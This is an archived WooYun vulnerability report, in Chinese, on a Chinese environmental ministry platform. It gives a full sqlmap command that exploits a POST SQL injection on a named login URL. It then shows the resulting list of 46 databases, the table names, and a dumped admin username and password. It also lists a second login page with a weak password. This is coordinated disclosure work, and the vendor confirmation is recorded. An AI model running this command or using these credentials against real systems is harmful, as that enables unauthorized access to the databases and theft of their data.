乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-21: 细节已通知厂商并且等待厂商处理中 2014-09-26: 厂商已经确认,细节仅向厂商公开 2014-10-06: 细节向核心白帽子及相关领域专家公开 2014-10-16: 细节向普通白帽子公开 2014-10-26: 细节向实习白帽子公开 2014-11-05: 细节向公众公开
环保部某平台POST注入可脱库,外加一个弱口令。。。
post注入:
root@kali:~# sqlmap -u "http://www.envsc.cn/applyonline/login/Index.aspx" --data="__VIEWSTATE=%2FwEPDwUKMTYxNjg1MDU5OA9kFgICBQ8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgJmDxUCFjIwMTQwOTEwMTcyNTQ0OTM4OC5kb2NY6LCD5pW05o6S5rGh6LS55b6B5pS25qCH5YeG5Z%2B56K6t54%2Bt5YiG57uE5ZCN5Y2VLeaKpeWQjeaXtuivt%2BaMieWIhue7hOWQjeWNlei%2Fm%2BihjOaKpeWQjWRkbTCrOoTVmjtAEpSRpKg%2FdZrPTRo%3D&__EVENTVALIDATION=%2FwEWAwLp8MLLBgK97eLVCQLhmrXHBUaK0YC%2Bl6YA2qdDOSHDxkzQEIJH&KeyWord=123&BtnDo=" -p "KeyWord" --is-dba
泄露大量数据:
available databases [46]:[*] 2013年数据传输有效率考核基数确认库[*] apply[*] ApplyDataBase[*] ApplyTestDB[*] auto[*] AutomonitorDCDB[*] BaseDatabaseDBFX[*] BaseDatabaseDBliaoning[*] BSGGPTTEST[*] BulletinFile[*] ControlPSListSewageTreatmentPlantDB[*] DataAnasysDBFirstQuarter_yhf[*] DataAnasysDBSecondQuarter[*] DataAnasysDBThirdQuarter[*] ddpttest[*] EnvbbsDB[*] EnvironmentDB[*] envsc[*] EnvscHBZWDB[*] googleDB[*] IndexTestDB[*] MaintenanceDB[*] master[*] model[*] msdb[*] PCDB20140415[*] PCDBTest[*] PwfCollectionDB[*] pwsf30[*] PWSFTESTDB[*] PWSFWebSiteDB[*] QuaterFour[*] QuaterOne[*] QuaterThree[*] QuaterTwo[*] RelationDataDB[*] ReportServer[*] ReportServerTempDB[*] SBaseDataDB[*] SchedulingDB[*] SourceProgramUserManageDB[*] student[*] StudentTXHDB[*] StudentTXLDB[*] tempdb[*] ValidDatabase: EnvironmentDB[14 tables]+------------------------------+| Article || ArticleComment || ArticleRelation || OqListInfo || OqListOhterInfo || OqRemarkTable || PictureComment || ProductInfo || ProductOtherInfo || Salutatory || Users || ViewGetAllEnvEquipmentList || ViewGetDepartmentNameChanged || ViewGetEnvEquipmentList |+------------------------------+Database: EnvironmentDBTable: Users[1 entry]+----+----------+----------+| ID | UserName | PassWord |+----+----------+----------+| 1 | envadmin | 123456 |+----+----------+----------+
附赠一个弱密码:http://www.envsc.cn/schedulingplatform/PlatformLogin/login.html密码为1
过滤,改密码。。。
危害等级:高
漏洞Rank:10
确认时间:2014-09-26 10:04
暂无